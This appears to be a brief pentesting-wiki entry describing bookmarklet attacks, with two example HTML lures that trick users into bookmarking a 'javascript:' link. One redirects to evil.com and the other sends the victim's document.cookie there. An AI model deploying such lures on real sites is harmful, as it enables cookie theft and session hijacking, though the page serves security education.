# Bookmarklet Attack

If attackers can inject arbitrary JavaScript code in target website, they can induce victims to malicious executions with bookmarklet.

### Exploitation <a href="#exploitation" id="exploitation"></a>

#### Malicious Links <a href="#malicious-links" id="malicious-links"></a>

Attackers induce victims to add their malicious link into the bookmark menu as below.

```
<p>Drag and drop the following link into the bookmark menu to access easily!</p>
<a href="javascript:window.location='https://evil.com/'">Example.com</a>
```

In addition, if the current website does not set **`HttpOnly`** flag on the **`Set-Cookie`** response header, attackers can get the victim's cookie and send it to the malicious website as below.

```
<p>Drag and drop me the following link into the bookmark menu to access easily!</p>
<a href="javascript:window.location='https://evil.com/?c='+document.cookie">Example.com</a>
```

### References <a href="#references" id="references"></a>

* [SOCRadar](https://socradar.io/csp-bypass-unveiled-the-hidden-threat-of-bookmarklets/)